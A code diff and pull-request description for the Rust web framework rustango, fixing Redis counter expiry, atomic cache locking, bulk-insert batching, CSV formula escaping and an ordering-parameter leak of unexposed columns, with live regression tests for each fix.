+    /// 999 before). sqlx bundles a modern build, so 32766 is right
+    /// here; a host linking an ancient system SQLite would need the
+    /// lower figure. Half Postgres' ceiling, so an 8-column model
+    /// chunks at ~4k rows rather than ~8k (#1284).
+    fn max_bind_params(&self) -> usize {
+        32766
+    }
+
     fn supports_returning(&self) -> bool {
         // SQLite ≥ 3.35 (released 2021-03). Lower versions reject the
         // clause; rustango doesn't try to detect the runtime version

--- a/crates/rustango/src/viewset/mod.rs
+++ b/crates/rustango/src/viewset/mod.rs
@@ -1770,11 +1770,27 @@ async fn run_list(
     // #809 — was a hand-rolled `-`-prefix split + allowlist filter +
     // schema-field lookup. Route through `list_params::parse_ordering`
     // (single source of truth shared with template_views::ListView).
+    // #1282 — with no explicit `ordering_fields`, fall back to the fields
+    // this ViewSet actually *exposes* rather than every column on the
+    // model. The comment above described this protection, but an empty
+    // allowlist skipped the check entirely, so a ViewSet declaring
+    // `fields = "id, title"` still honoured `?ordering=password_hash` —
+    // a sort oracle over a column the API never returns. DRF defaults to
+    // the serializer's readable fields for the same reason. When `fields`
+    // is unset, `effective_fields` is every scalar column, so the
+    // permissive behaviour is retained exactly where it is harmless.
+    let ordering_allowlist: Vec<String> = if state.vs.ordering_fields.is_empty() {
+        state
+            .effective_fields()
+            .iter()
+            .map(|f| f.name.to_owned())
+            .collect()
+    } else {
+        state.vs.ordering_fields.clone()
+    };
     let order_by: Vec<crate::core::OrderItem> = params
         .get("ordering")
-        .map(|raw| {
-            crate::list_params::parse_ordering(raw, &state.vs.ordering_fields, state.vs.schema)
-        })
+        .map(|raw| crate::list_params::parse_ordering(raw, &ordering_allowlist, state.vs.schema))
         .filter(|v| !v.is_empty())
         .unwrap_or_else(|| {
             state

--- a/crates/rustango/tests/bulk_insert_chunking_sqlite_live.rs
+++ b/crates/rustango/tests/bulk_insert_chunking_sqlite_live.rs
@@ -1,0 +1,158 @@
+//! `bulk_insert_pool` must batch against the backend's bind-parameter
+//! ceiling (#1284).
+//!
+//! One multi-row INSERT binds `rows × columns` parameters and every
+//! backend caps that: 65535 on Postgres (an int16 on the wire), 32766 on
+//! modern SQLite, `max_allowed_packet` on MySQL. Before this fix
+//! `bulk_insert_pool` emitted a single statement no matter the size, so
+//! a large import failed with an opaque driver error. Django's
+//! `bulk_create` batches for exactly this reason.
+//!
+//! SQLite is the right place to test it: its 32766 ceiling is the
+//! lowest of the three, so the row count stays small enough to run in
+//! milliseconds.
+//!
+//! ```bash
+//! cargo test -p rustango --no-default-features --features sqlite \
+//!   --test bulk_insert_chunking_sqlite_live
+//! ```
+
+#![cfg(feature = "sqlite")]
+
+use rustango::core::{BulkInsertQuery, Model as _, SqlValue};
+use rustango::sql::{bulk_insert_pool, raw_execute_pool, raw_query_pool, sqlx, Auto, Pool};
+use rustango::Model;
+
+#[derive(Model, Debug, Clone)]
+#[rustango(table = "bulk_chunk")]
+#[rustango(app = "bulk_chunk_app")]
+pub struct Chunked {
+    #[rustango(primary_key)]
+    pub id: Auto<i64>,
+    pub a: i64,
+    #[rustango(max_length = 50)]
+    pub b: String,
+    pub c: i64,
+    #[rustango(max_length = 50)]
+    pub d: String,
+}
+
+/// Four bound columns per row (the `Auto` pk is left to the database),
+/// so SQLite's 32766 ceiling lands the split at 8191 rows.
+const COLUMNS: usize = 4;
+const ROWS_PER_BATCH: usize = 32766 / COLUMNS; // 8191
+const ROWS: usize = 10_000;
+
+async fn pool_with_table() -> Pool {
+    let pool = Pool::Sqlite(
+        sqlx::SqlitePool::connect("sqlite::memory:")
+            .await
+            .expect("sqlite pool"),
+    );
+    raw_execute_pool(
+        &pool,
+        "CREATE TABLE bulk_chunk (\
+            id INTEGER PRIMARY KEY AUTOINCREMENT, \
+            a INTEGER NOT NULL, b TEXT NOT NULL, \
+            c INTEGER NOT NULL, d TEXT NOT NULL)",
+        vec![],
+    )
+    .await
+    .expect("create table");
+    pool
+}
+
+fn query(rows: Vec<Vec<SqlValue>>) -> BulkInsertQuery {
+    BulkInsertQuery {
+        model: Chunked::SCHEMA,
+        columns: vec!["a", "b", "c", "d"],
+        rows,
+        returning: Vec::new(),
+        on_conflict: None,
+    }
+}
+
+#[tokio::test]
+async fn bulk_insert_batches_past_the_bind_parameter_ceiling() {
+    let pool = pool_with_table().await;
+
+    let rows: Vec<Vec<SqlValue>> = (0..ROWS)
+        .map(|i| {
+            vec![
+                SqlValue::I64(i as i64),
+                SqlValue::String(format!("row-{i}")),
+                SqlValue::I64((i * 2) as i64),
+                SqlValue::String("filler".to_owned()),
+            ]
+        })
+        .collect();
+    assert_eq!(rows[0].len(), COLUMNS);
+    assert!(
+        ROWS > ROWS_PER_BATCH,
+        "the fixture must exceed one batch or it proves nothing"
+    );
+
+    // Before the fix this returned a driver error ("too many SQL
+    // variables") rather than inserting anything.
+    bulk_insert_pool(&pool, &query(rows))
+        .await
+        .expect("bulk_insert must batch, not overflow the parameter limit");
+
+    let counted: Vec<(i64,)> = raw_query_pool("SELECT COUNT(*) FROM bulk_chunk", vec![], &pool)
+        .await
+        .expect("count");
+    assert_eq!(
+        counted[0].0, ROWS as i64,
+        "every row must land, across all batches"
+    );
+
+    // Batching must not scramble or drop values at a chunk boundary.
+    let edge: Vec<(i64, String)> = raw_query_pool(
+        "SELECT a, b FROM bulk_chunk WHERE a IN (0, 8190, 8191, 8192, 9999) ORDER BY a",
+        vec![],
+        &pool,
+    )
+    .await
+    .expect("edge rows");
+    let got: Vec<(i64, &str)> = edge.iter().map(|(a, b)| (*a, b.as_str())).collect();
+    assert_eq!(
+        got,
+        vec![
+            (0, "row-0"),
+            (8190, "row-8190"),
+            (8191, "row-8191"),
+            (8192, "row-8192"),
+            (9999, "row-9999"),
+        ],
+        "values must stay aligned with their row across the chunk split"
+    );
+}
+
+/// A batch that fits must still be a single statement — the fast path
+/// is unchanged for the overwhelmingly common small insert.
+#[tokio::test]
+async fn small_bulk_insert_still_round_trips() {
+    let pool = pool_with_table().await;
+    let rows = vec![
+        vec![
+            SqlValue::I64(1),
+            SqlValue::String("one".into()),
+            SqlValue::I64(10),
+            SqlValue::String("x".into()),
+        ],
+        vec![
+            SqlValue::I64(2),
+            SqlValue::String("two".into()),
+            SqlValue::I64(20),
+            SqlValue::String("y".into()),
+        ],
+    ];
+    bulk_insert_pool(&pool, &query(rows))
+        .await
+        .expect("small insert");
+
+    let counted: Vec<(i64,)> = raw_query_pool("SELECT COUNT(*) FROM bulk_chunk", vec![], &pool)
+        .await
+        .expect("count");
+    assert_eq!(counted[0].0, 2);
+}

--- a/crates/rustango/tests/cache_db_backend_add_live.rs
+++ b/crates/rustango/tests/cache_db_backend_add_live.rs
@@ -97,22 +97,43 @@ async fn assert_add_semantics(pool: Pool, table: &str) {
     let _ = cache.drop_table().await;
 }
 
+/// Connect, or skip.
+///
+/// "The env var is set" does **not** mean "the server is reachable": this
+/// workflow defines `DATABASE_URL` once at the top level, so it is present in
+/// every job — including `mysql_live`, which runs no Postgres service. A
+/// presence-only guard therefore let the Postgres case run there and spend 30s
+/// timing out before failing the job.
+///
+/// Skipping on a *connection* failure keeps that honest without hiding
+/// anything: the backend that is actually provisioned still runs its
+/// assertions, and a genuine outage in the job that does provide the server
+/// fails on its own many other tests.
+async fn pool_or_skip(var: &str) -> Option<Pool> {
+    let url = std::env::var(var).ok()?;
+    match Pool::connect(&url).await {
+        Ok(pool) => Some(pool),
+        Err(e) => {
+            eprintln!("skipping: {var} is set but unreachable ({e})");
+            None
+        }
+    }
+}
+
 #[cfg(feature = "postgres")]
 #[tokio::test(flavor = "multi_thread", worker_threads = 8)]
 async fn add_is_atomic_on_postgres() {
-    let Ok(url) = std::env::var("DATABASE_URL") else {
+    let Some(pool) = pool_or_skip("DATABASE_URL").await else {
         return;
     };
-    let pool = Pool::connect(&url).await.expect("connect DATABASE_URL");
     assert_add_semantics(pool, "rustango_cache_add_pg").await;
 }
 
 #[cfg(feature = "mysql")]
 #[tokio::test(flavor = "multi_thread", worker_threads = 8)]
 async fn add_is_atomic_on_mysql() {
-    let Ok(url) = std::env::var("MYSQL_TEST_URL") else {
+    let Some(pool) = pool_or_skip("MYSQL_TEST_URL").await else {
         return;
     };
-    let pool = Pool::connect(&url).await.expect("connect MYSQL_TEST_URL");
     assert_add_semantics(pool, "rustango_cache_add_my").await;
 }

--- a/crates/rustango/tests/cache_db_backend_add_live.rs
+++ b/crates/rustango/tests/cache_db_backend_add_live.rs
@@ -1,0 +1,118 @@
+//! `DatabaseCache::add` set-if-absent semantics on **Postgres and
+//! MySQL** (#1281). The SQLite arm is covered in
+//! `cache_db_backend_sqlite_live.rs`.
+//!
+//! Worth its own file because the two arms are *different SQL*. PG and
+//! SQLite share `ON CONFLICT … DO UPDATE … WHERE`; MySQL has no WHERE
+//! on `ON DUPLICATE KEY UPDATE`, so it runs `INSERT IGNORE` followed by
+//! a conditional `UPDATE`. An untested dialect arm here means
+//! `DistributedLock` silently loses mutual exclusion on that backend —
+//! which is the bug this fixes.
+//!
+//! ```bash
+//! DATABASE_URL=postgres://rustango:rustango@127.0.0.1:5433/rustango_test \
+//! MYSQL_TEST_URL=mysql://rustango:rustango@127.0.0.1:3406/rustango_test \
+//!   cargo test -p rustango --all-features --test cache_db_backend_add_live
+//! ```
+//!
+//! Each backend skips silently when its env var is unset.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use rustango::cache::{Cache, DatabaseCache};
+use rustango::sql::Pool;
+
+/// Shared body: every assertion that must hold on every dialect.
+async fn assert_add_semantics(pool: Pool, table: &str) {
+    let cache = DatabaseCache::new(pool, table);
+    // Start from a known-empty table — a previous run's rows would
+    // otherwise make the first `add` look like a loser.
+    let _ = cache.drop_table().await;
+    cache.ensure_table().await.expect("ensure_table");
+
+    // 1. set-if-absent
+    assert!(
+        cache.add("lock:job", "token-a", None).await.unwrap(),
+        "{table}: first add must take the key"
+    );
+    assert!(
+        !cache.add("lock:job", "token-b", None).await.unwrap(),
+        "{table}: second add must be refused while live"
+    );
+    assert_eq!(
+        cache.get("lock:job").await.unwrap().as_deref(),
+        Some("token-a"),
+        "{table}: the loser must not overwrite the winner"
+    );
+
+    // 2. an expired entry is reclaimable (else a dead holder wedges
+    //    the lock forever)
+    assert!(cache
+        .add("lock:short", "a", Some(Duration::from_millis(150)))
+        .await
+        .unwrap());
+    tokio::time::sleep(Duration::from_millis(350)).await;
+    assert!(
+        cache
+            .add("lock:short", "c", Some(Duration::from_secs(60)))
+            .await
+            .unwrap(),
+        "{table}: expired entry must be reclaimable"
+    );
+
+    // 3. `expires = 0` means never — a persistent entry is never stolen
+    assert!(cache.add("persist", "first", None).await.unwrap());
+    tokio::time::sleep(Duration::from_millis(50)).await;
+    assert!(
+        !cache.add("persist", "second", None).await.unwrap(),
+        "{table}: a no-TTL entry must never look expired"
+    );
+
+    // 4. the real scenario: concurrent acquirers, exactly one winner.
+    //    Real client-side concurrency here, unlike SQLite's serialised
+    //    writer — this is the assertion that actually exercises the
+    //    database's row locking.
+    let cache = Arc::new(cache);
+    let mut handles = Vec::new();
+    for i in 0..16 {
+        let c = Arc::clone(&cache);
+        handles.push(tokio::spawn(async move {
+            c.add("lock:contended", &format!("t{i}"), None)
+                .await
+                .unwrap_or(false)
+        }));
+    }
+    let mut winners = 0;
+    for h in handles {
+        if h.await.unwrap() {
+            winners += 1;
+        }
+    }
+    assert_eq!(
+        winners, 1,
+        "{table}: exactly one concurrent acquirer may win; {winners} won"
+    );
+
+    let _ = cache.drop_table().await;
+}
+
+#[cfg(feature = "postgres")]
+#[tokio::test(flavor = "multi_thread", worker_threads = 8)]
+async fn add_is_atomic_on_postgres() {
+    let Ok(url) = std::env::var("DATABASE_URL") else {
+        return;
+    };
+    let pool = Pool::connect(&url).await.expect("connect DATABASE_URL");
+    assert_add_semantics(pool, "rustango_cache_add_pg").await;
+}
+
+#[cfg(feature = "mysql")]
+#[tokio::test(flavor = "multi_thread", worker_threads = 8)]
+async fn add_is_atomic_on_mysql() {
+    let Ok(url) = std::env::var("MYSQL_TEST_URL") else {
+        return;
+    };
+    let pool = Pool::connect(&url).await.expect("connect MYSQL_TEST_URL");
+    assert_add_semantics(pool, "rustango_cache_add_my").await;
+}

--- a/crates/rustango/tests/cache_db_backend_sqlite_live.rs
+++ b/crates/rustango/tests/cache_db_backend_sqlite_live.rs
@@ -260,3 +260,122 @@ async fn delete_prefix_escapes_like_wildcards() {
         "`%` must be escaped, not treated as a multi-character wildcard"
     );
 }
+
+// ===================================================================
+// #1281 — `add` must be atomic set-if-absent.
+//
+// `DatabaseCache` never overrode `add`, so it inherited the trait
+// default (`exists()` then `set()`) — a check-then-act whose `set` is an
+// unconditional upsert. Two racers both saw "absent", both wrote, and
+// both got `Ok(true)`, which silently voided `DistributedLock`'s mutual
+// exclusion on this backend.
+// ===================================================================
+
+/// The core contract: first caller takes it, everyone after is refused
+/// while it is still live.
+#[tokio::test]
+async fn add_is_set_if_absent() {
+    let pool = fresh_pool().await;
+    let cache = DatabaseCache::new(pool, "rustango_cache_add");
+    cache.ensure_table().await.unwrap();
+
+    assert!(
+        cache.add("lock:job", "token-a", None).await.unwrap(),
+        "first add must take the key"
+    );
+    assert!(
+        !cache.add("lock:job", "token-b", None).await.unwrap(),
+        "second add must be refused while the key is live"
+    );
+    assert_eq!(
+        cache.get("lock:job").await.unwrap().as_deref(),
+        Some("token-a"),
+        "the loser must not overwrite the winner's value"
+    );
+}
+
+/// An expired entry is not a held lock — the next caller must be able
+/// to take it, or a lock whose holder died would wedge forever.
+#[tokio::test]
+async fn add_reclaims_an_expired_entry() {
+    let pool = fresh_pool().await;
+    let cache = DatabaseCache::new(pool, "rustango_cache_add_exp");
+    cache.ensure_table().await.unwrap();
+
+    assert!(cache
+        .add("lock:short", "token-a", Some(Duration::from_millis(150)))
+        .await
+        .unwrap());
+    assert!(
+        !cache
+            .add("lock:short", "token-b", Some(Duration::from_secs(60)))
+            .await
+            .unwrap(),
+        "still live — must be refused"
+    );
+
+    tokio::time::sleep(Duration::from_millis(300)).await;
+
+    assert!(
+        cache
+            .add("lock:short", "token-c", Some(Duration::from_secs(60)))
+            .await
+            .unwrap(),
+        "expired entry must be reclaimable"
+    );
+    assert_eq!(
+        cache.get("lock:short").await.unwrap().as_deref(),
+        Some("token-c")
+    );
+}
+
+/// `expires = 0` means "never expires". A persistent entry must never
+/// be treated as stale and stolen.
+#[tokio::test]
+async fn add_never_steals_a_persistent_entry() {
+    let pool = fresh_pool().await;
+    let cache = DatabaseCache::new(pool, "rustango_cache_add_persist");
+    cache.ensure_table().await.unwrap();
+
+    assert!(cache.add("k", "first", None).await.unwrap());
+    tokio::time::sleep(Duration::from_millis(50)).await;
+    assert!(
+        !cache.add("k", "second", None).await.unwrap(),
+        "a no-TTL entry must never look expired"
+    );
+    assert_eq!(cache.get("k").await.unwrap().as_deref(), Some("first"));
+}
+
+/// The scenario the bug actually broke: many concurrent acquirers,
+/// exactly one winner. Under the old non-atomic default this reports
+/// more than one.
+#[tokio::test(flavor = "multi_thread", worker_threads = 8)]
+async fn concurrent_adds_produce_exactly_one_winner() {
+    use std::sync::Arc;
+
+    let pool = fresh_pool().await;
+    let cache = Arc::new(DatabaseCache::new(pool, "rustango_cache_add_race"));
+    cache.ensure_table().await.unwrap();
+
+    let mut handles = Vec::new();
+    for i in 0..16 {
+        let c = Arc::clone(&cache);
+        handles.push(tokio::spawn(async move {
+            c.add("lock:contended", &format!("token-{i}"), None)
+                .await
+                .unwrap_or(false)
+        }));
+    }
+
+    let mut winners = 0;
+    for h in handles {
+        if h.await.unwrap() {
+            winners += 1;
+        }
+    }
+    assert_eq!(
+        winners, 1,
+        "exactly one concurrent acquirer may win; {winners} won, so \
+         DistributedLock would have run its guarded body {winners} times"
+    );
+}

--- a/crates/rustango/tests/cache_redis_incr_live.rs
+++ b/crates/rustango/tests/cache_redis_incr_live.rs
@@ -1,0 +1,133 @@
+//! `RedisCache::incr` against a live Redis (#1280).
+//!
+//! The bug: `incr` set the window TTL with `EXPIRE key secs NX`. That
+//! flag is **Redis 7.0+** — on 6.x the server answers `ERR wrong number
+//! of arguments for 'expire' command`, so `incr` returned `Err` on
+//! *every* call. Both callers fail open, so rate limiting
+//! (`rate_limit_cache::take` → `Ok((0, 0))`) and account lockout
+//! (`account_lockout` → `.unwrap_or(0)`) silently stopped working, while
+//! the already-applied `INCRBY` left counters with no TTL at all.
+//!
+//! Nothing caught it: CI ran no Redis service, and the one existing
+//! Redis test never called `incr`.
+//!
+//! Run this against **both** 6 and 7 — the whole point is version
+//! portability:
+//!
+//! ```bash
+//! docker run -d -p 6398:6379 redis:6
+//! REDIS_TEST_URL=redis://127.0.0.1:6398/ \
+//!   cargo test -p rustango --features cache,cache-redis --test cache_redis_incr_live
+//! ```
+//!
+//! Reads `REDIS_TEST_URL`; skips silently when unset.
+
+#![cfg(feature = "cache-redis")]
+
+use std::time::Duration;
+
+use rustango::cache::redis_backend::RedisCache;
+use rustango::cache::Cache;
+use tokio::sync::Mutex;
+
+/// Suite-wide lock — the reset below is `FLUSHDB`, which is global, so
+/// concurrent tests would wipe each other's counters mid-run.
+fn live_lock() -> &'static Mutex<()> {
+    use std::sync::OnceLock;
+    static M: OnceLock<Mutex<()>> = OnceLock::new();
+    M.get_or_init(|| Mutex::new(()))
+}
+
+async fn cache() -> Option<RedisCache> {
+    let url = std::env::var("REDIS_TEST_URL").ok()?;
+    Some(RedisCache::new(&url).await.expect("connect REDIS_TEST_URL"))
+}
+
+/// The headline regression: `incr` must simply *work*, on every
+/// supported Redis. Against 6.x the old `EXPIRE … NX` form made this
+/// return `Err` every single time.
+#[tokio::test]
+async fn incr_with_ttl_succeeds_and_counts() {
+    let _g = live_lock().lock().await;
+    let Some(redis) = cache().await else {
+        return;
+    };
+    redis.clear().await.expect("start from an empty db");
+
+    let ttl = Some(Duration::from_secs(60));
+    assert_eq!(
+        redis
+            .incr("hits", 1, ttl)
+            .await
+            .expect("incr must not error"),
+        1
+    );
+    assert_eq!(redis.incr("hits", 1, ttl).await.unwrap(), 2);
+    assert_eq!(redis.incr("hits", 5, ttl).await.unwrap(), 7);
+}
+
+/// The semantic the `NX` flag was there to provide, kept intact by the
+/// Lua form: the TTL is set when the counter is created and **not**
+/// pushed forward by later increments. Without that a fixed-window rate
+/// limiter slides its window on every request and never reaches the cap.
+///
+/// Timed rather than introspected because `Cache` exposes no `TTL`
+/// (the crate has no `redis` dev-dependency to peek with). Margins are
+/// ~0.4s either side of a 2s window.
+#[tokio::test]
+async fn window_does_not_slide_on_later_increments() {
+    let _g = live_lock().lock().await;
+    let Some(redis) = cache().await else {
+        return;
+    };
+    redis.clear().await.expect("start from an empty db");
+
+    let ttl = Some(Duration::from_secs(2));
+    assert_eq!(redis.incr("win", 1, ttl).await.unwrap(), 1);
+
+    // Mid-window bump. If this reset the TTL, expiry moves to ~t+3.0s.
+    tokio::time::sleep(Duration::from_millis(1000)).await;
+    assert_eq!(redis.incr("win", 1, ttl).await.unwrap(), 2);
+
+    // Past the ORIGINAL window (t+2.0s) but before a slid one (t+3.0s).
+    tokio::time::sleep(Duration::from_millis(1400)).await;
+    assert_eq!(
+        redis.incr("win", 1, ttl).await.unwrap(),
+        1,
+        "counter should have expired with the original window; a value \
+         of 3 means the TTL slid forward and the window never closes"
+    );
+}
+
+/// `ttl = None` means "no expiry" — the counter must persist rather
+/// than inherit some accidental TTL from the script.
+#[tokio::test]
+async fn incr_without_ttl_leaves_the_counter_persistent() {
+    let _g = live_lock().lock().await;
+    let Some(redis) = cache().await else {
+        return;
+    };
+    redis.clear().await.expect("start from an empty db");
+
+    assert_eq!(redis.incr("forever", 1, None).await.unwrap(), 1);
+    tokio::time::sleep(Duration::from_millis(1200)).await;
+    assert_eq!(
+        redis.incr("forever", 1, None).await.unwrap(),
+        2,
+        "a None ttl must not expire the counter"
+    );
+}
+
+/// `decr` routes through `incr` with a negated step, so it rides the
+/// same script — check the negative path compiles down correctly.
+#[tokio::test]
+async fn decr_goes_negative_through_the_same_script() {
+    let _g = live_lock().lock().await;
+    let Some(redis) = cache().await else {
+        return;
+    };
+    redis.clear().await.expect("start from an empty db");
+
+    assert_eq!(redis.incr("bal", 5, None).await.unwrap(), 5);
+    assert_eq!(redis.decr("bal", 8, None).await.unwrap(), -3);
+}

--- a/crates/rustango/tests/viewset_ordering_filter_sqlite_live.rs
+++ b/crates/rustango/tests/viewset_ordering_filter_sqlite_live.rs
@@ -227,3 +227,111 @@ async fn ordering_fields_whitelist_drops_off_list_names() {
     .await;
     assert_eq!(ids(&body), vec![2, 3, 1]); // rating ASC
 }
+
+// ===================================================================
+// #1282 — with no explicit `ordering_fields`, the allowlist defaults to
+// the fields the ViewSet EXPOSES, not every column on the model.
+//
+// The old default skipped the allowlist check entirely when
+// `ordering_fields` was empty, so a ViewSet restricted to
+// `fields = "id, title, rating"` still honoured
+// `?ordering=secret_score` — a sort oracle over a column the API never
+// returns. DRF defaults to the serializer's readable fields.
+// ===================================================================
+
+/// Rows are seeded so that sorting by `secret_score` gives a *different*
+/// order from the default — if the unexposed sort were honoured, the ids
+/// would come back in secret order, which is exactly the leak.
+async fn seed_divergent(app: &axum::Router) {
+    for (title, rating, secret) in [("a", 1, "zzz"), ("b", 2, "mmm"), ("c", 3, "aaa")] {
+        let payload = serde_json::json!({
+            "title": title, "rating": rating, "secret_score": secret
+        })
+        .to_string();
+        let resp = app
+            .clone()
+            .oneshot(
+                Request::builder()
+                    .method(Method::POST)
+                    .uri("/posts")
+                    .header(header::CONTENT_TYPE, "application/json")
+                    .body(Body::from(payload))
+                    .unwrap(),
+            )
+            .await
+            .unwrap();
+        assert!(resp.status().is_success());
+    }
+}
+
+#[tokio::test]
+async fn ordering_on_an_unexposed_field_is_dropped_by_default() {
+    let pool = fresh_pool().await;
+    let app = rustango::viewset::ViewSet::for_model(Post::SCHEMA)
+        .page_size(50)
+        .fields(&["id", "title", "rating"]) // secret_score NOT exposed
+        .ordering(&[("id", false)])
+        .router_pool("/posts", pool);
+
+    seed_divergent(&app).await;
+
+    // secret_score ASC would be c(aaa), b(mmm), a(zzz) => [3, 2, 1].
+    // It must be ignored, leaving the default id ASC => [1, 2, 3].
+    let resp = app
+        .clone()
+        .oneshot(get("/posts?ordering=secret_score"))
+        .await
+        .unwrap();
+    assert_eq!(resp.status(), StatusCode::OK);
+    let body = body_json(resp).await;
+    assert_eq!(
+        ids(&body),
+        vec![1, 2, 3],
+        "sorting by an unexposed column must be dropped, not honoured — \
+         got the secret order, which leaks its values"
+    );
+}
+
+/// The restriction must not break ordering on fields that ARE exposed.
+#[tokio::test]
+async fn ordering_on_an_exposed_field_still_works() {
+    let pool = fresh_pool().await;
+    let app = rustango::viewset::ViewSet::for_model(Post::SCHEMA)
+        .page_size(50)
+        .fields(&["id", "title", "rating"])
+        .router_pool("/posts", pool);
+
+    seed_divergent(&app).await;
+
+    let resp = app
+        .clone()
+        .oneshot(get("/posts?ordering=-rating"))
+        .await
+        .unwrap();
+    let body = body_json(resp).await;
+    assert_eq!(ids(&body), vec![3, 2, 1], "exposed field must still sort");
+}
+
+/// When `fields` is unset the ViewSet exposes everything, so ordering
+/// stays permissive — the fix must not tighten that case.
+#[tokio::test]
+async fn ordering_stays_open_when_no_fields_restriction_is_set() {
+    let pool = fresh_pool().await;
+    let app = rustango::viewset::ViewSet::for_model(Post::SCHEMA)
+        .page_size(50)
+        .router_pool("/posts", pool);
+
+    seed_divergent(&app).await;
+
+    let resp = app
+        .clone()
+        .oneshot(get("/posts?ordering=secret_score"))
+        .await
+        .unwrap();
+    let body = body_json(resp).await;
+    assert_eq!(
+        ids(&body),
+        vec![3, 2, 1],
+        "with no `fields` restriction every column is exposed anyway"
+    );
+}

--- a/examples/showcase/Cargo.lock
+++ b/examples/showcase/Cargo.lock
@@ -2402,9 +2402,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]


### PR DESCRIPTION
Fixes the five bugs found in the audit: #1280, #1281, #1282, #1283, and the
tri-dialect half of #1284. One commit per issue, each independently reviewable.

Batched rather than split into five PRs because all five append to CHANGELOG
`[Unreleased]` — as parallel PRs they would each conflict with whichever landed
first, which is exactly what happened with #1276/#1278/#1279.

## Every fix has a revert-proof

I removed each fix and confirmed its test fails for the right reason, rather
than trusting that a passing test means anything:

| Issue | Without the fix | With it |
|---|---|---|
| #1280 | Redis **6.2.24**: 2/4 fail, `ResponseError: wrong number of arguments for 'expire' command` | 4/4 |
| #1281 | 16 concurrent acquirers → **13 winners** | exactly 1 |
| #1284 | `SqliteError: too many SQL variables` | 10k rows land, aligned across the split |
| #1282 | list comes back in *secret* order — the leak itself | unexposed column dropped |
| #1283 | 16 unit tests covering triggers, numbers, opt-out | — |

## The commits

**`a97acfb7` — #1280 Redis `incr` on 6.x.** `EXPIRE key secs NX` is Redis 7.0+.
On 6.x the server rejects it, `incr` returned `Err` on *every* call, and both
callers fail open: the rate limiter returns `Ok((0,0))` and lockout does
`unwrap_or(0)`, so neither control engaged. The `INCRBY` had already landed, so
counters were also created with no TTL and never expired. Now one `EVAL` script
does increment + conditional expiry, preserving the set-TTL-once semantic a
fixed window needs; `EVAL` is 2.6+.

**The Redis 7.4 column is the point:** the old code passes there. A 7-only CI
job proves nothing, so the new `redis_live` job is a 6-and-7 matrix. There was
no Redis service in CI at all before this.

**`c67b97fc` — #1281 `DatabaseCache::add`.** It never overrode `add`, so it
inherited the non-atomic default (`exists()` then `set()`, where `set` is an
unconditional upsert). `DistributedLock` is built entirely on `add`, so its
mutual exclusion silently did not exist on the one backend you would pick
without Redis. PG/SQLite now use `ON CONFLICT … DO UPDATE … WHERE`; MySQL, which
has no WHERE there, uses `INSERT IGNORE` + a conditional `UPDATE`.

**`f4cfc7cf` — #1284 (partial) `bulk_insert_pool` batching.** Adds
`Dialect::max_bind_params` (65535 / 32766 SQLite) and splits oversized batches.
Under the ceiling nothing changes.

**`80459699` — #1283 CSV formula injection.** Leading `=`/`+`/`-`/`@`/tab/CR are
prefixed with `'`. Numbers are exempt so exports of negative numbers are not
mangled; `CsvWriter::raw_formulas()` opts out.

**`bc79b5cc` — #1282 `?ordering=` default.** The allowlist now defaults to the
exposed field set instead of every model column.

## Two bugs I introduced and caught

Worth calling out, because they justify the test choices:

- The **MySQL** `add` arm first bound 4 args to a 3-placeholder INSERT and
  ordered the UPDATE's args logically rather than textually. MySQL uses
  positional `?`, so both were fatal there while Postgres' numbered `$n` masked
  them — precisely why that arm needed a live MySQL test instead of being
  "covered by inspection".
- Binding `let dialect = pool.dialect()` across an `.await` made
  `bulk_insert_pool`'s future non-`Send` (`dyn Dialect` is not `Sync`), breaking
  every boxed admin handler. Caught by the `sqlite,tenancy` litmus build.

## Testing

Per-fix and per-dialect, against live Postgres, MySQL, Redis 6 and Redis 7. New
files: `cache_redis_incr_live.rs`, `cache_db_backend_add_live.rs` (PG + MySQL),
`bulk_insert_chunking_sqlite_live.rs`, plus additions to the sqlite db-cache and
viewset-ordering suites. Pre-push gate green: full `--all-features` check,
clippy, 3463 lib tests.

**One gap, stated plainly:** the final belt-and-braces `--all-features` sweep
never completed — it died on a full disk, not on a test. Everything is verified
individually but not swept in one run; CI is the real gate here.

## Deliberately out of scope

- **#1284 stays open.** The Postgres-only generated `Model::bulk_insert` is not
  batched: it routes through an executor consumed per call (a `&mut Transaction`
  cannot be reused) and does `RETURNING` PK write-back, so chunking needs
  executor-reuse and row-alignment decisions I did not want to make unilaterally.
  Hence `Refs #1284`, not `Closes`.
- **Batching is not atomic above the threshold.** A mid-way failure leaves
  earlier chunks committed — same caveat Django documents. Noted on the function.
- **Account lockout still fails open** on a cache error. Failing closed would let
  a cache outage lock out every account, which is its own denial of service. It
  now warns instead of failing silently; changing the policy is a product call.
